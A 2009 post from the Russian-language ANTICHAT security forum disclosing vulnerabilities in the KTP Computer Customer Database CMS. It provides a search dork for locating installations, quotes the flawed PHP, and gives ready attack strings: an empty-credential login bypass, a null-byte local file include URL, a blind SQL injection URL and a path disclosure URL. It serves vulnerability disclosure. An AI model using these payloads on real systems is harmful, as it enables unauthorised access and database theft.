ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости KTP Computer Customer Database
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости KTP Computer Customer Database
  #1  
Старый 12.04.2009, 21:12
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости KTP Computer Customer Database
Уязвимости KTP Computer Customer Database CMS

Product : KTP Computer Customer Database CMS
Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Founded by: Dimi4
Date : 12.04.09

Auth bypass
[pages/login.php]
Вот такая вот корявая функция. Проверяет только пароль:

PHP код:
if ($_GET['a'] == "login") {
    $lname $_POST['lname'];
    $lpass md5($_POST['lpass']);

    $q mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
    $result mysql_fetch_array($q);

    if ($lpass == $result['tloginpass']) {
        $_SESSION['tid'] = $result['tid'];
        $_SESSION['loggedin'] = "1";
        $_SESSION['tname'] = $result['tfname'] . " " $result['tlname'];
        $lin 1;
        
        $template->assign('name'$_SESSION['tname']);
        $template->assign('id'$_SESSION['tid']);
        
        $template->assign('func'"in");
        $template->display('login.tpl');
    } else {
        echo "login failed";
    } 
Логинимся с пустыми логином и паролем.

Local File Include
[index.php]

PHP код:
if (isset($_GET['p'])) {
    include 'pages/' $_GET['p'] . '.php';
} else {
    include 'pages/index.php';

http://localhost/ktp/?p={PATH}%00

Blind SQL-inj
[index.php]

PHP код:
    function gettech($tid) {
        
        if ($result mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
            $tech mysql_fetch_array($result);
            return $tech;
        } else {
            echo mysql_error();
        }
    } 
http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1 )=[num]--

Full Path Disclosure
[index.php]

Код:
http://localhost/ktp/pages/tech/changepassword.php
Последний раз редактировалось Dimi4; 12.04.2009 в 21:15..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Инъекции m0nzt3r Уязвимости 12414 17.06.2010 21:21
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
The computer freezes with no reason? That’s why! Dracula4ever Forum for discussion of ANTICHAT 2 16.07.2006 09:37
Краткое пособие по языку Sql •••™NO FEAR™••• Чужие Статьи 1 28.02.2006 19:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ